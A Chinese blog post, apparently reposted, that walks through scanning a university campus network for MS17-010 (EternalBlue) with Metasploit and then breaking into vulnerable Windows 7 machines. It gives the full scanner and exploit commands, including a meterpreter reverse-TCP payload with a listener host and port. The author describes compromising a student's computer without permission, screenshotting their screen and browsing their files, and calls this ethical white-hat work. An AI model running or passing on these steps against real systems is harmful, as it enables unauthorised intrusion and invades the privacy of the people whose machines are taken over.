实战!利用MSF批量扫描校园网中含有MS17_010漏洞的主机并入侵_ ...

实战!利用MSF批量扫描校园网中含有MS17_010漏洞的主机并入侵_ ...

2023年6月24日发(作者:)

实战!利⽤MSF批量扫描校园⽹中含有MS17_010漏洞的主机并⼊侵利⽤ms17_010的永恒之蓝在前些⽇⼦⽕爆了⼀段时间,校园⽹中也声称封锁了相应端⼝。最近在搞MSF的深⼊学习,于是有了下⽂。ms17_010扫描⼯具msf中的辅助模块含有⼀个强⼤的ms17_010扫描⼯具:

auxiliary/scanner/smb/smb_ms17_010

使⽤这个⼯具可以快速扫描某个⽹段中含有ms17_010漏洞的主机,该⼯具的使⽤也很简单。⾸先确定要扫描的⽹段,以我学校的校园局域⽹为例,要扫描的⽹段为10.31.0.0/16。实际上经过测试,只需扫描10.31.0-128.1-254就可以了。具体的命令如下:

use auxiliary/scanner/smb/smb_ms17_010set rhosts 10.31.0-128.1-254 set threads 512 exploit扫描的部分结果如下图所⽰:上图中,左侧有绿⾊加号标记的主机并且被识别出来是Windows 7的主机有很⼤概率存在该漏洞。如果被识别出是Windows 8 或者Windows 10的主机,基本上是不能成功的。当尝试完Windows 7 的后,如果还没有⼀台可以⼊侵的,可以继续尝试那些左侧是红⾊减号并且没有识别出系统版本的。好了,⽬标主机有了,下⾯就是开始⼊侵了!利⽤ms17_010⼊侵主机msf中的exploit模块中含有ms17_010的利⽤⼯具:

exploit/windows/smb/ms17_010_eternalblue该⼯具的使⽤也很简单,只要设置好⽬标主要的ip和payload就可以exploit了。

需要注意的是,在使⽤该exploit⼊侵主机时,如果⼀次不能成功,尽量不要尝试第⼆次了,这样很容易把⽬标主机搞崩溃。具体的命令如下:use exploit/windows/smb/ms17_010_eternalblueset rhost 10.31.36.66 set payload windows/x64/meterpreter/reverse_tcp set lhost 10.31.30.49 set lport 4567 exploit以上命令中的10.31.36.66为⽬标主机,监听反连的主机ip为10.31.30.49,也就是⾃⼰的主机ip,监听的端⼝为4567端⼝。不过上⾯那台主机并没有成功,下⾯是另外⼀台成功⼊侵的截图:可以上⾯中的10.31.36.103 主机被成功⼊侵了:)。然后输⼊screenshot截个图看看主⼈在⼲什么吧。screenshot好吧,在看LOL⽐赛 0.0 。我还是简单看看机⼦上有没动作⽚好下载,然后上传个txt提醒他修复漏洞好了。我们都是有操守的⽩帽⼦对吧:)。⾄此,利⽤MSF对ms17_010漏洞主机的发现和⼊侵过程就结束了,通过这些对校园⽹的扫描,发现还是有⼤部分主机是存在该漏洞的。。。

发布者:admin,转转请注明出处:http://www.yc00.com/xiaochengxu/1687579474a21790.html

相关推荐

发表回复

评论列表(0条)

  • 暂无评论

联系我们

400-800-8888

在线咨询: QQ交谈

邮件:admin@example.com

工作时间:周一至周五,9:30-18:30,节假日休息

关注微信